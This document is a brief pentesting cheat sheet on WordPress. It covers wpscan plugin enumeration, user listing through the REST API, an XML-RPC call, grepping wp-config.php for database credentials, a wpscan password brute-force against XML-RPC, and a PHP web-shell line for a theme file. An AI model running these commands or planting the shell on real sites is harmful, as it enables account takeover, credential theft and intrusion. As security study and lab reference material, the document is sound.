WordPress
WordPress Enumeration
WP Scan
Scan all plugins:
wpscan --url http://<ip> --enumerate ap --plugins-detection aggressive --api-token <api-token> -v
[!important] Always do full scans on plugins as many of them are vulnerable.
WP-JSON
User Info:
/wp-json/wp/v2/users
/wp-json/oembed/1.0/embed?url=POST-URL
Page Info:
/wp-json/wp/v2/pages
XML-RPC
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
wp-config.php
Hunting for Credentials:
If we can read the wp-config.php file, it is possible to look for SQL database credentials:
cat wp-config.php | grep 'DB_USER\|DB_PASSWORD'
Useful in Arbitrary File Read, or Privilege Escalation
Attacking
Login Bruteforce:
sudo wpscan --password-attack xmlrpc -t 20 -U <user> -P /usr/share/wordlists/rockyou.txt --url http://<url>
Code Execution:
Requires Admin access. Inject this into a theme in Theme Editor:
system($_GET[cmd]);
Then visit the php page with
?cmd=<command>
Known Vulnerabilities:
Vulnerable Plugins - mail-masta
Vulnerable Plugins - wpDiscuz
Last updated